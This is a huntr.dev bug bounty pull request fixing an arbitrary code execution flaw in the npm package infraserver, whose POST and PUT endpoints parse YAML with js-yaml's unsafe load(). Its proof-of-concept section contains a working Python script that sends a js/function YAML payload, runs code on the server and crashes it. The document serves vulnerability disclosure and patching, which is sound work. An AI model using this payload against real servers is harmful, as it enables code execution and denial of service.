
Security Fix for Arbitrary Code Execution - huntr.dev #17

Open · wants to merge 3 commits into master

Conversation

huntr-helper

https://huntr.dev/users/alromh87 has fixed the Arbitrary Code Execution vulnerability 🔨. alromh87 has been awarded $25 for fixing the vulnerability through the huntr bug bounty program 💰. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

| Q | A |
| --- | --- |
| Version Affected | ALL |
| Bug Fix | YES |
| Original Pull Request | 418sec#2 |
| Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/npm/infraserver/1/README.md |

User Comments:

📊 Metadata *

infraserver is a data server; this package is vulnerable to Arbitrary Code Execution due to the default usage of the function load() of the package js-yaml instead of its secure replacement, safeLoad().

It took me a little while to implement the PoC properly, but now it's cleanly solved.

Bounty URL: https://www.huntr.dev/bounties/1-npm-infraserver

⚙️ Description *

I replaced the use of yaml.load() with yaml.safeLoad() and added handling of error if loading fails.

💻 Technical Description *

Two vulnerable endpoints were found on infra: POST and PUT.

Code execution is avoided by using yamlLoad(), but by just replacing the function (as in the other PR) a malicious payload would trigger a DoS, so I avoided that by using try ... catch.

🐛 Proof of Concept (PoC) *

1. Download Infra: `git clone https://github.com/xuemen/Infra`
2. Enter directory: `cd infra`
3. Start server: `node server/Infra.data.js`
4. Create poc.py:

```python
#!/bin/python
# -*- coding: utf-8 -*-

import requests

print('Post request -----------------------')
r = requests.post('http://localhost:46372', data="hasOwnProperty: !<tag:yaml.org,2002:js/function> ' () => {console.log(`This is code executed on the server, started from payload`)}' ")
print(r)
print(r.text)

print('\n\n\n')

print('Put request ------------------------')
r = requests.put('http://localhost:46372', data="hasOwnProperty: !<tag:yaml.org,2002:js/function> ' () => {console.log(`This is code executed on the server, started from payload`)}' ")
print(r)
print(r.text)
```

5. Execute poc: `python poc.py`
6. The server will execute the injected code, printing `This is code executed on the server, started from payload` to the console, and then die, causing a DoS.

Before fix

[Screenshot: 2020-09-11 19-28-53]

Only replacing the use of the function (incomplete fix)

[Screenshot: 2020-09-11 19-36-52]

🔥 Proof of Fix (PoF) *

After the fix no code is executed and the server stays online.

[Screenshot: 2020-09-11 19-42-52]

👍 User Acceptance Testing (UAT)

Functionality unaffected.

[Screenshot: 2020-09-11 20-27-42]
